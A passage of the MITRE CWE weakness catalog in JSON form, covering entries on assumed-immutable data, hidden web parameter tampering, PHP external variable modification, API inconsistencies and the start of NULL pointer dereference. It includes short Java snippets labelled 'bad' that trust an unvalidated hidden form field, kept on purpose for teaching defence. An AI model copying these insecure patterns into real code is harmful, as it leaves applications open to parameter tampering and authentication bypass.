that are attacked are environment variables, web application parameters, and HTTP headers."},{"Scope":"Integrity","Impact":"Unexpected State"}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Operation","Implementation"],"Description":"When the data is stored or transmitted through untrusted sources that could modify the data, implement integrity checks to detect unauthorized modification, or store/transmit the data in a trusted location that is free from external influence."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the code excerpt below, an array returned by a Java method is modified despite the fact that arrays are mutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String[] colors = car.getAllPossibleColors();colors[0] = \\"Red\\";","xhtml:br":""}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1757","Description":"Relies on $PHP_SELF variable for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1757"},{"Reference":"CVE-2005-1905","Description":"Gain privileges by modifying assumed-immutable code addresses that are accessed by a driver.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1905"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Modification of Assumed-Immutable Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"384"}},{"attr":{"@_CAPEC_ID":"385"}},{"attr":{"@_CAPEC_ID":"386"}},{"attr":{"@_CAPEC_ID":"387"}},{"attr":{"@_CAPEC_ID":"388"}}]},"Notes":{"Note":[{"#text":"MAID issues can be primary to many other weaknesses, and they are a major factor in languages that provide easy access to internal program constructs, such as PHP\'s register_globals and similar features. However, MAID issues can also be resultant from weaknesses that modify internal state; for example, a program might validate some data and store it in memory, but a buffer overflow could overwrite that validated data, leading to a change in program logic.","attr":{"@_Type":"Relationship"}},{"#text":"There are many examples where the MUTABILITY property is a major factor in a vulnerability.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, Relationship_Notes, Theoretical_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"472":{"attr":{"@_ID":"472","@_Name":"External Control of Assumed-Immutable Web Parameter","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields.","Extended_Description":{"xhtml:p":["If a web product does not properly protect assumed-immutable values from modification in hidden form fields, parameters, cookies, or URLs, this can lead to modification of critical data. Web applications often mistakenly make the assumption that data passed to the client in hidden fields or cookies is not susceptible to tampering. Improper validation of data that are user-controllable can lead to the application processing incorrect, and often malicious, input.","For example, custom cookies commonly store session data or persistent data across sessions. This kind of session data is normally involved in security related decisions on the server side, such as user authentication and access control. Thus, the cookies might contain sensitive data such as user credentials and privileges. This is a dangerous practice, as it can often lead to improper reliance on the value of the client-provided cookie by the server side application."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"642","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Assumed-Immutable Parameter Tampering"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Without appropriate protection mechanisms, the client can easily tamper with cookies and similar web data. Reliance on the cookies without detailed validation can lead to problems such as SQL injection. If you use cookie values for security related decisions on the server side, manipulating the cookies might lead to violations of security policies such as authentication bypassing, user impersonation and privilege escalation. In addition, storing sensitive data in the cookie without appropriate protection can also lead to disclosure of sensitive user data, especially data stored in persistent cookies."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In this example, a web application uses the value of a hidden form field (accountID) without having done any input validation because it was assumed to be immutable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String accountID = request.getParameter(\\"accountID\\");User user = getUserFromID(Long.parseLong(accountID));","xhtml:br":""}}},{"Intro_Text":"Hidden fields should not be trusted as secure parameters.","Body_Text":["An attacker can intercept and alter hidden fields in a post to the server as easily as user input fields. An attacker can simply parse the HTML for the substring:","or even just \\"hidden\\". Hidden field values displayed later in the session, such as on the following page, can open a site up to cross-site scripting attacks."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":"&lt;input type=\\"hidden\\""}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0108","Description":"Forum product allows spoofed messages of other users via hidden form fields for name and e-mail address.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0108"},{"Reference":"CVE-2000-0253","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0253"},{"Reference":"CVE-2000-0254","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0254"},{"Reference":"CVE-2000-0926","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0926"},{"Reference":"CVE-2000-0101","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0101"},{"Reference":"CVE-2000-0102","Description":"Shopping cart allows price modification via hidden form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0102"},{"Reference":"CVE-2000-0758","Description":"Allows admin access by modifying value of form field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0758"},{"Reference":"CVE-2002-1880","Description":"Read messages by modifying message ID parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1880"},{"Reference":"CVE-2000-1234","Description":"Send email to arbitrary users by modifying email parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1234"},{"Reference":"CVE-2005-1652","Description":"Authentication bypass by setting a parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1652"},{"Reference":"CVE-2005-1784","Description":"Product does not check authorization for configuration change admin script, leading to password theft via modified e-mail address field.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1784"},{"Reference":"CVE-2005-2314","Description":"Logic error leads to password disclosure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2314"},{"Reference":"CVE-2005-1682","Description":"Modification of message number parameter allows attackers to read other people\'s messages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1682"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Web Parameter Tampering"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A4","Entry_Name":"Insecure Direct Object Reference","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"146"}},{"attr":{"@_CAPEC_ID":"226"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 4: Use of Magic URLs, Predictable Cookies, and Hidden Form&#xA;                  Fields.&#34; Page 75"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;Embedding State in HTML and URLs&#34;, Page 1032"}}]},"Notes":{"Note":[{"#text":"This is a primary weakness for many other weaknesses and functional consequences, including XSS, SQL injection, path disclosure, and file inclusion.","attr":{"@_Type":"Relationship"}},{"#text":"This is a technology-specific MAID problem.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Other_Notes, Relationship_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Web Parameter Tampering","attr":{"@_Date":"2008-04-11"}}}},"473":{"attr":{"@_ID":"473","@_Name":"PHP External Variable Modification","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Requirements","Implementation"],"Description":"Carefully identify which variables can be controlled or influenced by an external user, and consider adopting a naming convention to emphasize when externally modifiable variables are being used. An application should be reluctant to trust variables that have been initialized outside of its trust boundary. Ensure adequate checking is performed when relying on input from outside a trust boundary. Do not allow your application to run with register_globals enabled. If you implement a register_globals emulator, be extremely careful of variable extraction, dynamic evaluation, and similar issues, since weaknesses in your emulation could allow external variable modification to take place even without register_globals."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0860","Description":"File upload allows arbitrary file read by setting hidden form variables to match internal variable names.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0860"},{"Reference":"CVE-2001-0854","Description":"Mistakenly trusts $PHP_SELF variable to determine if include script was called by its parent.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0854"},{"Reference":"CVE-2002-0764","Description":"PHP remote file inclusion by modified assumed-immutable variable.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0764"},{"Reference":"CVE-2001-1025","Description":"Modify key variable when calling scripts that don\'t load a library that initializes it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1025"},{"Reference":"CVE-2003-0754","Description":"Authentication bypass by modifying array used for authentication.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0754"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PHP External Variable Modification"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"77"}}},"Notes":{"Note":{"#text":"This is a language-specific instance of Modification of Assumed-Immutable Data (MAID). This can be resultant from direct request (alternate path) issues. It can be primary to weaknesses such as PHP file inclusion, SQL injection, XSS, authentication bypass, and others.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"474":{"attr":{"@_ID":"474","@_Name":"Use of Function with Inconsistent Implementations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses a function that has inconsistent implementations across operating systems and versions.","Extended_Description":{"xhtml:p":["The use of inconsistent implementations can cause changes in behavior when the code is ported or built under a different environment than the programmer expects, which can lead to security problems in some cases.","The implementation of many functions varies by platform, and at times, even by different versions of the same platform. Implementation differences can include:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Slight differences in the way parameters are interpreted leading to inconsistent results.","Some implementations of the function carry significant security risks.","The function might not be defined on all platforms.","The function might change which return codes it can provide, or change the meaning of its return codes."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"758","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Indirect"}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Requirements"],"Description":"Do not accept inconsistent behavior from the API specifications when the deviant behavior increase the risk level."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Inconsistent Implementations"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Inconsistent Implementations","attr":{"@_Date":"2008-04-11"}}}},"475":{"attr":{"@_ID":"475","@_Name":"Undefined Behavior for Input to API","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The behavior of this function is undefined unless its control parameter is set to a specific value.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Undefined Behavior"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"The Linux Standard Base Specification 2.0.1 for libc places constraints on the arguments to some internal functions [21]. If the constraints are not met, the behavior of the functions is not defined. It is unusual for this function to be called directly. It is almost always invoked through a macro defined in a system header file, and the macro ensures that the following constraints are met: The value 1 must be passed to the third parameter (the version number) of the following file system function: __xmknod The value 2 must be passed to the third parameter (the group argument) of the following wide character string functions: __wcstod_internal __wcstof_internal __wcstol_internal __wcstold_internal __wcstoul_internal The value 3 must be passed as the first parameter (the version number) of the following file system functions: __xstat __lxstat __fxstat __xstat64 __lxstat64 __fxstat64","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Undefined Behavior","attr":{"@_Date":"2008-04-11"}}}},"476":{"attr":{"@_ID":"476","@_Name":"NULL Pointer Dereference","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.","Extended_Description":"NULL pointer dereference issues can occur through a number of flaws, including race conditions, and simple programming omissions.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"NULL pointer dereferences are frequently resultant from rarely encountered error conditions, since these are most likely to escape detection during the testing phases."}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"NULL pointer dereferences usually result in the failure of the process unless exception handling (on some platforms) is available and implemented. Even when exception handling is being used, it can still be very difficult to return the software to a safe state of operation."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"In rare circumstances, when NULL is equivalent to the 0x0 memory address and privileged code can access it, then writing or reading memory is possible, which may lead to code execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"If all pointers that could have been modified are sanity-checked previous to use, nearly all NULL pointer dereferences can be prevented."},{"Phase":"Requirements","Description":"The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is non-null before acting upon it.","Effectiveness":"Moderate","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. This solution does not handle the use of improperly initialized variables (CWE-665)."},{"Phase":"Architecture and Design","Description":"Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values."},{"Phase":"Implementation","Description":"Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"While there are no 